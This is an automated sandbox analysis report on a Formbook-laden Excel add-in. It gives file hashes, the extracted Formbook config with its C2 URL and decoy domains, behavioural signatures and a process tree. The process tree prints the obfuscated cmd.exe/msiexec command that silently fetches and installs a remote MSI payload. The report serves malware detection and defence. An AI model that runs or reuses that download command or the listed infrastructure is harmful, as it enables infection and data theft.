Analysis
-
max time kernel
148s -
max time network
139s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
05-05-2021 18:36
Static task
static1
Behavioral task
behavioral1
Sample
file2083.xlam
Resource
win7v20210410
General
-
Target
file2083.xlam
-
Size
15KB
-
MD5
399563af4221cc2c176d8f218d6a563d
-
SHA1
72251218c8127abeab4c04944445c18bdac2688f
-
SHA256
cc9cefa7960d991d414051f5fe153ffa514a2e687143dd2b1b6966edbbcadbec
-
SHA512
bb0aef3126bc94f5bc32bddc96b4c6720b4eeeaa91c1a80c95039d4c88871fdc33ceef7cd579bd00d4acbc62987f9e6c0fa7efa08de81e4a4db8194f81f6ebea
Malware Config
Extracted
formbook
4.1
http://www.111bjs.com/ccr/
abdullahlodhi.com
jevya.com
knoxvillerestaurant.com
mekarauroko7389.com
cricketspowder.net
johannchirinos.com
orangeorganical.com
libero-tt.com
lorenaegianluca.com
wintab.net
modernmillievintage.com
zgdqcyw.com
jeffabildgaardmd.com
nurulfikrimakassar.com
findyourchef.com
innovationsservicegroup.com
destek-taleplerimiz.com
whfqqco.icu
kosmetikmadeingermany.com
dieteticos.net
savarsineklik.com
newfashiontrends.com
e-mobilitysolutions.com
spaced.ltd
amjadalitrading.com
thejstutor.com
zzhqp.com
exoticomistico.com
oklahomasundayschool.com
grwfrog.com
elementsfitnessamdwellbeing.com
auldontoyworld.com
cumhuriyetcidemokratparti.kim
thetruthinternational.com
adimadimingilizce.com
retreatwinds.com
duoteshop.com
jasonkokrak.com
latindancextreme.com
agavedeals.com
motz.xyz
kspecialaroma.com
yuejinjc.com
print12580.com
ampsports.tennis
affordablebathroomsarizona.com
casnop.com
driftwestcoastmarket.com
bjsjygg.com
gwpjamshedpur.com
reserveacalifornia.com
caobv.com
culturaenmistacones.com
back-upstore.com
jjsmiths.com
iamxc.com
siobhankrittiya.com
digitalakanksha.com
koatku.com
shamushalkowich.com
merplerps.com
fishexpertise.com
sweetheartmart.com
nqs.xyz
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3720 424 cmd.exe EXCEL.EXE -
Formbook Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2324-188-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral2/memory/2200-195-0x0000000000730000-0x000000000075E000-memory.dmp formbook -
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 17 576 msiexec.exe -
Executes dropped EXE 2 IoCs
Processes:
MSI9803.tmpMSI9803.tmppid process 3156 MSI9803.tmp 2324 MSI9803.tmp -
Loads dropped DLL 1 IoCs
Processes:
MSI9803.tmppid process 3156 MSI9803.tmp -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 2888 msiexec.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
MSI9803.tmpMSI9803.tmpmsiexec.exedescription pid process target process PID 3156 set thread context of 2324 3156 MSI9803.tmp MSI9803.tmp PID 2324 set thread context of 2180 2324 MSI9803.tmp Explorer.EXE PID 2200 set thread context of 2180 2200 msiexec.exe Explorer.EXE -
Drops file in Windows directory 6 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\MSI8F84.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI9764.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9803.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 6 IoCs
Processes:
resource yara_rule C:\Windows\Installer\MSI9803.tmp nsis_installer_1 C:\Windows\Installer\MSI9803.tmp nsis_installer_2 C:\Windows\Installer\MSI9803.tmp nsis_installer_1 C:\Windows\Installer\MSI9803.tmp nsis_installer_2 C:\Windows\Installer\MSI9803.tmp nsis_installer_1 C:\Windows\Installer\MSI9803.tmp nsis_installer_2 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 424 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 54 IoCs
Processes:
msiexec.exeMSI9803.tmpmsiexec.exepid process 576 msiexec.exe 576 msiexec.exe 2324 MSI9803.tmp 2324 MSI9803.tmp 2324 MSI9803.tmp 2324 MSI9803.tmp 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe 2200 msiexec.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2180 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
MSI9803.tmpMSI9803.tmpmsiexec.exepid process 3156 MSI9803.tmp 2324 MSI9803.tmp 2324 MSI9803.tmp 2324 MSI9803.tmp 2200 msiexec.exe 2200 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exeMSI9803.tmpmsiexec.exeExplorer.EXEdescription pid process Token: SeShutdownPrivilege 2888 msiexec.exe Token: SeIncreaseQuotaPrivilege 2888 msiexec.exe Token: SeSecurityPrivilege 576 msiexec.exe Token: SeCreateTokenPrivilege 2888 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2888 msiexec.exe Token: SeLockMemoryPrivilege 2888 msiexec.exe Token: SeIncreaseQuotaPrivilege 2888 msiexec.exe Token: SeMachineAccountPrivilege 2888 msiexec.exe Token: SeTcbPrivilege 2888 msiexec.exe Token: SeSecurityPrivilege 2888 msiexec.exe Token: SeTakeOwnershipPrivilege 2888 msiexec.exe Token: SeLoadDriverPrivilege 2888 msiexec.exe Token: SeSystemProfilePrivilege 2888 msiexec.exe Token: SeSystemtimePrivilege 2888 msiexec.exe Token: SeProfSingleProcessPrivilege 2888 msiexec.exe Token: SeIncBasePriorityPrivilege 2888 msiexec.exe Token: SeCreatePagefilePrivilege 2888 msiexec.exe Token: SeCreatePermanentPrivilege 2888 msiexec.exe Token: SeBackupPrivilege 2888 msiexec.exe Token: SeRestorePrivilege 2888 msiexec.exe Token: SeShutdownPrivilege 2888 msiexec.exe Token: SeDebugPrivilege 2888 msiexec.exe Token: SeAuditPrivilege 2888 msiexec.exe Token: SeSystemEnvironmentPrivilege 2888 msiexec.exe Token: SeChangeNotifyPrivilege 2888 msiexec.exe Token: SeRemoteShutdownPrivilege 2888 msiexec.exe Token: SeUndockPrivilege 2888 msiexec.exe Token: SeSyncAgentPrivilege 2888 msiexec.exe Token: SeEnableDelegationPrivilege 2888 msiexec.exe Token: SeManageVolumePrivilege 2888 msiexec.exe Token: SeImpersonatePrivilege 2888 msiexec.exe Token: SeCreateGlobalPrivilege 2888 msiexec.exe Token: SeRestorePrivilege 576 msiexec.exe Token: SeTakeOwnershipPrivilege 576 msiexec.exe Token: SeRestorePrivilege 576 msiexec.exe Token: SeTakeOwnershipPrivilege 576 msiexec.exe Token: SeRestorePrivilege 576 msiexec.exe Token: SeTakeOwnershipPrivilege 576 msiexec.exe Token: SeRestorePrivilege 576 msiexec.exe Token: SeTakeOwnershipPrivilege 576 msiexec.exe Token: SeRestorePrivilege 576 msiexec.exe Token: SeTakeOwnershipPrivilege 576 msiexec.exe Token: SeRestorePrivilege 576 msiexec.exe Token: SeTakeOwnershipPrivilege 576 msiexec.exe Token: SeDebugPrivilege 2324 MSI9803.tmp Token: SeDebugPrivilege 2200 msiexec.exe Token: SeShutdownPrivilege 2180 Explorer.EXE Token: SeCreatePagefilePrivilege 2180 Explorer.EXE Token: SeShutdownPrivilege 2180 Explorer.EXE Token: SeCreatePagefilePrivilege 2180 Explorer.EXE Token: SeShutdownPrivilege 2180 Explorer.EXE Token: SeCreatePagefilePrivilege 2180 Explorer.EXE Token: SeShutdownPrivilege 2180 Explorer.EXE Token: SeCreatePagefilePrivilege 2180 Explorer.EXE Token: SeShutdownPrivilege 2180 Explorer.EXE Token: SeCreatePagefilePrivilege 2180 Explorer.EXE Token: SeShutdownPrivilege 2180 Explorer.EXE Token: SeCreatePagefilePrivilege 2180 Explorer.EXE Token: SeShutdownPrivilege 2180 Explorer.EXE Token: SeCreatePagefilePrivilege 2180 Explorer.EXE Token: SeShutdownPrivilege 2180 Explorer.EXE Token: SeCreatePagefilePrivilege 2180 Explorer.EXE Token: SeShutdownPrivilege 2180 Explorer.EXE Token: SeCreatePagefilePrivilege 2180 Explorer.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 424 EXCEL.EXE 424 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
EXCEL.EXEpid process 424 EXCEL.EXE 424 EXCEL.EXE 424 EXCEL.EXE 424 EXCEL.EXE 424 EXCEL.EXE 424 EXCEL.EXE 424 EXCEL.EXE 424 EXCEL.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 2180 Explorer.EXE -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
EXCEL.EXEcmd.exemsiexec.exeMSI9803.tmpExplorer.EXEmsiexec.exedescription pid process target process PID 424 wrote to memory of 3720 424 EXCEL.EXE cmd.exe PID 424 wrote to memory of 3720 424 EXCEL.EXE cmd.exe PID 3720 wrote to memory of 2888 3720 cmd.exe msiexec.exe PID 3720 wrote to memory of 2888 3720 cmd.exe msiexec.exe PID 576 wrote to memory of 3156 576 msiexec.exe MSI9803.tmp PID 576 wrote to memory of 3156 576 msiexec.exe MSI9803.tmp PID 576 wrote to memory of 3156 576 msiexec.exe MSI9803.tmp PID 3156 wrote to memory of 2324 3156 MSI9803.tmp MSI9803.tmp PID 3156 wrote to memory of 2324 3156 MSI9803.tmp MSI9803.tmp PID 3156 wrote to memory of 2324 3156 MSI9803.tmp MSI9803.tmp PID 3156 wrote to memory of 2324 3156 MSI9803.tmp MSI9803.tmp PID 2180 wrote to memory of 2200 2180 Explorer.EXE msiexec.exe PID 2180 wrote to memory of 2200 2180 Explorer.EXE msiexec.exe PID 2180 wrote to memory of 2200 2180 Explorer.EXE msiexec.exe PID 2200 wrote to memory of 632 2200 msiexec.exe cmd.exe PID 2200 wrote to memory of 632 2200 msiexec.exe cmd.exe PID 2200 wrote to memory of 632 2200 msiexec.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\file2083.xlam"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com//admin/56701.msi /qn3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\system32\msiexec.exemSiExec /i http://farm-finn.com//admin/56701.msi /qn4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\Installer\MSI9803.tmp"3⤵PID:632
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\Installer\MSI9803.tmp"C:\Windows\Installer\MSI9803.tmp"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\Installer\MSI9803.tmp"C:\Windows\Installer\MSI9803.tmp"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
MD54fcb2a3ee025e4a10d21e1b154873fe2
SHA157658e2fa594b7d0b99d02e041d0f3418e58856b
SHA25690bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
SHA5124e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff
-
MD5
c143786765f282d07d418fe98d4fe91a
SHA1d3bbaa15dfe972e30bac4687d4fb1a96185e0bc8
SHA256c26dc231fde9a811c06eb82b7292892eb0db1ff3d45eeec55bc2a74944f39ac6
SHA51214af7f19f4e01949121832585fad1e7fec752cf91083126bf7fddf4ccd5d85aac4ca7bcd7b377b4f1a0a814db5f15f2f7172b4290e0ea1c260950d128a3e13bf
-
MD5
c143786765f282d07d418fe98d4fe91a
SHA1d3bbaa15dfe972e30bac4687d4fb1a96185e0bc8
SHA256c26dc231fde9a811c06eb82b7292892eb0db1ff3d45eeec55bc2a74944f39ac6
SHA51214af7f19f4e01949121832585fad1e7fec752cf91083126bf7fddf4ccd5d85aac4ca7bcd7b377b4f1a0a814db5f15f2f7172b4290e0ea1c260950d128a3e13bf
-
MD5
c143786765f282d07d418fe98d4fe91a
SHA1d3bbaa15dfe972e30bac4687d4fb1a96185e0bc8
SHA256c26dc231fde9a811c06eb82b7292892eb0db1ff3d45eeec55bc2a74944f39ac6
SHA51214af7f19f4e01949121832585fad1e7fec752cf91083126bf7fddf4ccd5d85aac4ca7bcd7b377b4f1a0a814db5f15f2f7172b4290e0ea1c260950d128a3e13bf
-
MD5
42b244a4f9d3af1a2788452e5507b0be
SHA14f59185e37d87cf7d4a0c43bc4f26b092c21e4bf
SHA25614ade88d57789eb08d264b56ff0b46317452e50702285aff672ff12768e45c4f
SHA512df0b5fc0fa680ff5ef849e3c9c312e07e4d741054dba3a9c9a7c05cfc2b99fba09776e864494a579cc34ba985c431d22de9917836cb38d1de05b9aea93fb55fa